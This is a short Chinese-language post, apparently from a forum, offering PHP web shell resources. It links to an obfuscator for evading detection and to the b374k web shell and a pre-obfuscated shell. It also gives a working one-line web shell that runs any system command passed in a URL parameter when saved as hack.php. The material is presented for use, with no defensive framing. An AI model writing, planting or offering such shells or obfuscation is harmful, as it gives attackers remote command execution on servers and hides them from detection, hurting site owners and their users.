這邊有php 混淆器,可以躲過一些偵測(但是他eval還是會在)
https://www.r57shell.net/obfuscator.php
下載 :b374k-2.8.php
或是支援php8的版本,不過速度有慢點b374k_support_php8/b374k.php
參考 https://www.r57shell.net/php-shells.php
把下面檔案存成hack.php 就可以透過hack.php?z=ping%20168.95.1.1來下指令,或是搭配上面混淆器
<?php $x=$_GET['z']; @system("$x");?>
這邊也有混淆好的版本,可以直接下載 onephpshell.php